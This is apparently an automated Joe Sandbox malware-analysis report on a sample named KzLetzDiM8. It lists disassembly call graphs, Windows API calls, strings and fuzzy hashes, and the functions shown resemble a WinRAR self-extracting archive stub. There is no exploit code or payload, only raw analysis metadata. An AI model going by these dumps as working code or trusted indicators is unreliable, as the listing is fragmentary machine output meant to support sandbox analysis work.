1fc0cb 24602 1fc73f 97 API calls 24599->24602 24601->24597 24611 1ee617 53 API calls 24601->24611 24602->24579 24604 1fc1b0 24809 1e12d3 GetDlgItem EnableWindow 24604->24809 24612 1ee617 53 API calls 24605->24612 24634 1fbeed 24605->24634 24606 1fbd56 24709 1e12f1 GetDlgItem ShowWindow 24606->24709 24613 1fbcfb 24607->24613 24615 1fbb39 GetModuleFileNameW 24607->24615 24616 1fbcf1 

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001F0863: GetModuleHandleW.KERNEL32(kernel32), ref: 001F087C
                                                              • Part of subcall function 001F0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001F088E
                                                              • Part of subcall function 001F0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001F08BF
                                                              • Part of subcall function 001FA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 001FA655
                                                              • Part of subcall function 001FAC16: OleInitialize.OLE32(00000000), ref: 001FAC2F
                                                              • Part of subcall function 001FAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001FAC66
                                                              • Part of subcall function 001FAC16: SHGetMalloc.SHELL32(00228438), ref: 001FAC70
                                                            • GetCommandLineW.KERNEL32 ref: 001FDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 001FDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 001FDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 001FDFCE
                                                              • Part of subcall function 001FDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001FDBF4
                                                              • Part of subcall function 001FDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001FDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 001FDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0023EC90,00000800), ref: 001FDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0023EC90), ref: 001FDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 001FE009
                                                            • _swprintf.LIBCMT ref: 001FE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 001FE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 001FE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 001FE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 001FE0C9
                                                            • Sleep.KERNEL32(?), ref: 001FE0F7
                                                            • DeleteObject.GDI32 ref: 001FE130
                                                            • DeleteObject.GDI32(?), ref: 001FE140
                                                            • CloseHandle.KERNEL32 ref: 001FE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz#
                                                            • API String ID: 3049964643-4129874184
                                                            • Opcode ID: 4ef7eb564a087f9e2f8c00e54db5a5961f1f63074e05cbd3a7ceb208f6134357
                                                            • Instruction ID: f6342c8d18a9ceee97c8f44f4ba63daa318977f3421f7b0bc23c3d659b3cd347
                                                            • Opcode Fuzzy Hash: 4ef7eb564a087f9e2f8c00e54db5a5961f1f63074e05cbd3a7ceb208f6134357
                                                            • Instruction Fuzzy Hash: F861F2B1908348BBD720EBA1FC4DFBB77EDAB69704F040429FA45921A1DB749A44C762

                                                            Control-flow Graph

                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001FB73D,00000066), ref: 001FA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001FB73D,00000066), ref: 001FA72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 001FA73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001FA762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 001FA7C6
                                                              • Part of subcall function 001FA626: GdipAlloc.GDIPLUS(00000010), ref: 001FA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001FA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 001FA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: d0e40302c53a0e3f6dd16af298674b9452f1762b5e2d2c2181c59c666c9eb539
                                                            • Instruction ID: 28b8d9c3a3671888f2f0f0916b0436747349083c6e3de19f5c8d8d920c0e952c
                                                            • Opcode Fuzzy Hash: d0e40302c53a0e3f6dd16af298674b9452f1762b5e2d2c2181c59c666c9eb539
                                                            • Instruction Fuzzy Hash: 5231A4B6500306BFD710AF21EC4CD6B7FB9FF94760B144628FA0992260EF36DD418AA1

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6C4
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA728
                                                            • GetLastError.KERNEL32(?,?,?,?,001EA592,000000FF,?,?), ref: 001EA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: cc45f9cb6290c264c1bd83b2987c96a4b2bdc2d5954ef2e38a7068a08bc406f9
                                                            • Instruction ID: 45544114660c05e5442e870f463362df01d4516d8e9f12be49abfe7f5102d981
                                                            • Opcode Fuzzy Hash: cc45f9cb6290c264c1bd83b2987c96a4b2bdc2d5954ef2e38a7068a08bc406f9
                                                            • Instruction Fuzzy Hash: E1416D72900559ABCB25DF64CC88AEEB7B9FF58350F504196E569E3200DB347E90CF90
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002,00000000), ref: 00207E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002,00000000), ref: 00207E16
                                                            • ExitProcess.KERNEL32 ref: 00207E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 7ba994bb83b8b6765886ab6e0995af6ba16f7135aabf5c77eddbac3e2fe0ca8f
                                                            • Instruction ID: ae4d8c7c7afb0b7f97d88f7dace3cebde628db0884ab99896c99e1740d98e8c0
                                                            • Opcode Fuzzy Hash: 7ba994bb83b8b6765886ab6e0995af6ba16f7135aabf5c77eddbac3e2fe0ca8f
                                                            • Instruction Fuzzy Hash: EBE04F31451244EBCF12AF10DD0D9893FAAEB24341B108454F8098A173CF36EE61CB90
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 02dda329db8a4bf98e380f898d39eeef4117d18f8bf499c26c8e3b2e45f97f99
                                                            • Instruction ID: edba3f2a500ede6808fc49984175104c1ede1de062f2ab7953c1159625550947
                                                            • Opcode Fuzzy Hash: 02dda329db8a4bf98e380f898d39eeef4117d18f8bf499c26c8e3b2e45f97f99
                                                            • Instruction Fuzzy Hash: EF82E970904AC5AEDF15DF65C891BFEBBB9BF15300F0841B9E84D9B192DB315A88CB60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: d99941aeee39f1aa15c232c92ad32f92edd573121ec980af8559ff01190a52e5
                                                            • Instruction ID: f71bdfb5620658bb9920abe25b9ee811c22b3e2d36231121ef3bf12d06d34ea9
                                                            • Opcode Fuzzy Hash: d99941aeee39f1aa15c232c92ad32f92edd573121ec980af8559ff01190a52e5
                                                            • Instruction Fuzzy Hash: D2D1A6B16083498FDB14CF28C8847ABBBE1FF99308F05456DFA899B242D774E905CB56
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001FB7E5
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 001FB902
                                                            • TranslateMessage.USER32(?), ref: 001FB910
                                                            • DispatchMessageW.USER32(?), ref: 001FB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 001FB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 001FB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 001FB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001FB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,002135F4), ref: 001FB9B1
                                                              • Part of subcall function 001FD453: _wcschr.LIBVCRUNTIME ref: 001FD45C
                                                              • Part of subcall function 001FD453: _wcslen.LIBCMT ref: 001FD47D
                                                            • SetFocus.USER32(00000000), ref: 001FB9B8
                                                            • _swprintf.LIBCMT ref: 001FBA24
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                              • Part of subcall function 001FD4D4: GetDlgItem.USER32(00000068,0023FCB8), ref: 001FD4E8
                                                              • Part of subcall function 001FD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,001FAF07,00000001,?,?,001FB7B9,0021506C,0023FCB8,0023FCB8,00001000,00000000,00000000), ref: 001FD510
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001FD51B
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,002135F4), ref: 001FD529
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD53F
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001FD559
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD59D
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001FD5AB
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD5BA
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD5E1
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,002143F4), ref: 001FD5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 001FBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 001FBA90
                                                            • GetTickCount.KERNEL32 ref: 001FBAAE
                                                            • _swprintf.LIBCMT ref: 001FBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 001FBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 001FBB43
                                                            • _swprintf.LIBCMT ref: 001FBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 001FBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 001FBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 001FBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 001FBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 001FBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 001FBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 001FBCEB
                                                            • _swprintf.LIBCMT ref: 001FBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,002135F4), ref: 001FBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 001FBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 001FBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001FBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FBE68
                                                            • _wcslen.LIBCMT ref: 001FBEBE
                                                            • _swprintf.LIBCMT ref: 001FBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 001FBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 001FBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 001FBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 001FBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 001FBF85
                                                            • SetWindowTextW.USER32(00000000,0022A472), ref: 001FBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 001FC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 001FC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 001FC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 001FC1D9
                                                              • Part of subcall function 001FC73F: __EH_prolog.LIBCMT ref: 001FC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FC1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$Q!
                                                            • API String ID: 3829768659-2003956012
                                                            • Opcode ID: 9b8b1b230a76f39322f5953d013a6dd77b8d0cce57f3ae71a2e7eca16333f813
                                                            • Instruction ID: 74a4090a8b3139d5cdab5c5c6d0f55970fe9eba3afa0c72bce552ddd6a37fda1
                                                            • Opcode Fuzzy Hash: 9b8b1b230a76f39322f5953d013a6dd77b8d0cce57f3ae71a2e7eca16333f813
                                                            • Instruction Fuzzy Hash: B642F87194424CBAEB21EBB0ED8EFBE77BCAB26700F004155F745A60D2CB749A45CB61

                                                            Control-flow Graph
                                                            control_flow_graph 268 1f0863-1f0886 call 1fec50 GetModuleHandleW 271 1f0888-1f089f GetProcAddress 268->271 272 1f08e7-1f0b48 268->272 275 1f08b9-1f08c9 GetProcAddress 271->275 276 1f08a1-1f08b7 271->276 273 1f0b4e-1f0b59 call 2075fb 272->273 274 1f0c14-1f0c40 GetModuleFileNameW call 1ec29a call 1f0602 272->274 273->274 286 1f0b5f-1f0b8d GetModuleFileNameW CreateFileW 273->286 291 1f0c42-1f0c4e call 1eb146 274->291 279 1f08cb-1f08e0 275->279 280 1f08e5 275->280 276->275 279->280 280->272 288 1f0b8f-1f0b9b SetFilePointer 286->288 289 1f0c08-1f0c0f CloseHandle 286->289 288->289 292 1f0b9d-1f0bb9 ReadFile 288->292 289->274 298 1f0c7d-1f0ca4 call 1ec310 GetFileAttributesW 291->298 299 1f0c50-1f0c5b call 1f081b 291->299 292->289 294 1f0bbb-1f0be0 292->294 296 1f0bfd-1f0c06 call 1f0371 294->296 296->289 304 1f0be2-1f0bfc call 1f081b 296->304 306 1f0cae 298->306 307 1f0ca6-1f0caa 298->307 299->298 309 1f0c5d-1f0c7b CompareStringW 299->309 304->296 311 1f0cb0-1f0cb5 306->311 307->291 310 1f0cac 307->310 309->298 309->307 310->311 313 1f0cec-1f0cee 311->313 314 1f0cb7 311->314 316 1f0dfb-1f0e05 313->316 317 1f0cf4-1f0d0b call 1ec2e4 call 1eb146 313->317 315 1f0cb9-1f0ce0 call 1ec310 GetFileAttributesW 314->315 323 1f0cea 315->323 324 1f0ce2-1f0ce6 315->324 327 1f0d0d-1f0d6e call 1f081b * 2 call 1ee617 call 1e4092 call 1ee617 call 1fa7e4 317->327 328 1f0d73-1f0da6 call 1e4092 AllocConsole 317->328 323->313 324->315 326 1f0ce8 324->326 326->313 334 1f0df3-1f0df5 ExitProcess 327->334 333 1f0da8-1f0ded GetCurrentProcessId AttachConsole call 203e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 001F087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001F088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001F08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001F0B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001F0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001F0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,|<!,00000000), ref: 001F0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 001F0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001F0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<!,?,00000000,?,00000800), ref: 001F0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,|<!,00000800,?,00000000,?,00000800), ref: 001F0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,D=!,00000800), ref: 001F0CD8
                                                              • Part of subcall function 001F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                              • Part of subcall function 001F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            • _swprintf.LIBCMT ref: 001F0D4A
                                                            • _swprintf.LIBCMT ref: 001F0D96
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • AllocConsole.KERNEL32 ref: 001F0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 001F0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 001F0DAF
                                                            • _wcslen.LIBCMT ref: 001F0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001F0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 001F0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 001F0DE7
                                                            • FreeConsole.KERNEL32 ref: 001F0DED
                                                            • ExitProcess.KERNEL32 ref: 001F0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: (=!$,<!$,@!$0?!$0A!$4B!$8>!$D=!$DXGIDebug.dll$H?!$H@!$HA!$P>!$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=!$`@!$d?!$dA!$dwmapi.dll$h=!$h>!$kernel32$uxtheme.dll$|<!$|?!$|@!$<!$>!$?!$@!$A!
                                                            • API String ID: 1207345701-1524096085
                                                            • Opcode ID: e0ff5b6c36a81a22b4835499f04444fc5aadc0289c3545b21f85ae69e4840bfd
                                                            • Instruction ID: 1dcaa7f18528f51e4f7e652f7cdb4c602f3a405c4bc6b7c07a66e822f31dad93
                                                            • Opcode Fuzzy Hash: e0ff5b6c36a81a22b4835499f04444fc5aadc0289c3545b21f85ae69e4840bfd
                                                            • Instruction Fuzzy Hash: 79D1B4B1418384AFD731EF50D848BDFBAE9BFA9704F50491DF68896141CBB08699CB92

                                                            Control-flow Graph
